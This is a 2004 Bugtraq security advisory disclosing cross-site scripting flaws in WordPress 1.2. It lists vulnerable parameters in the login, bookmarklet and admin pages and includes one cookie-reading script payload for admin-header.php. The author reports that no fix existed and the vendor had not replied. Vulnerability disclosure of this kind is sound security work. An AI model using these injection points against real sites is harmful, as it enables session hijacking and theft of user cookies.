Date: 27 Sep 2004 23:16:08 -0000
From: Thomas Waldegger <bugtraq@...ph3us.org>
To: bugtraq@...urityfocus.com
Subject: Multiple XSS Vulnerabilities in Wordpress 1.2

Vendor  : Wordpress
URL     : http://wordpress.org/
Version : Wordpress 1.2
Risk    : XSS

WordPress is a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability. [...]
Go to http://wordpress.org/ for detailed information.

Cross Site Scripting:
wp-login.php:
/wp-login.php?redirect_to=[XSS]
/wp-login.php?mode=bookmarklet&text=[XSS]
/wp-login.php?mode=bookmarklet&popupurl=[XSS]
/wp-login.php?mode=bookmarklet&popuptitle=[XSS]

Nearly every file in the administration panel of wordpress is vulnerable for XSS attacks.

admin-header.php:
/admin-header.php?redirect=1&redirect_url=%22;alert(document.cookie)//

Nice bug. ;o)

bookmarklet.php:
/bookmarklet.php?popuptitle=[XSS]
/bookmarklet.php?popupurl=[XSS]
/bookmarklet.php?content=[XSS]
/bookmarklet.php?post_title=[XSS]

categories.php:
/categories.php?action=edit&cat_ID=[XSS]

edit.php:
/edit.php?s=[XSS]

edit-comments.php:
/edit-comments.php?s=[XSS]
/edit-comments.php?mode=[XSS]

and so on ...

Solution:
There is not any solution yet. I contacted Matthew Mullenweg, one of the lead developers of wordpress, on Wednesday but I did not receive any answer until yet.

Credits:
Thomas Waldegger